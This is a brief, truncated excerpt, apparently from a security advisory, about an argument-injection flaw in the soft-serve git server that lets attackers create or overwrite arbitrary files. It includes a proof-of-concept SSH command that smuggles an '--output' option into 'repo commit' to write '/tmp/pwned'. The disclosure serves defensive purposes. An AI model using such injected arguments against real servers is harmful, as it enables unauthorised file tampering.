Attackers can create/override arbitrary files with uncontrolled data. For a PoC, spin up an instance of soft-serve as explained in the README, and execute the following command: sh ssh -p23231 localhost repo commit icecream — –output=/tmp/pwned It should have created a file in…Read More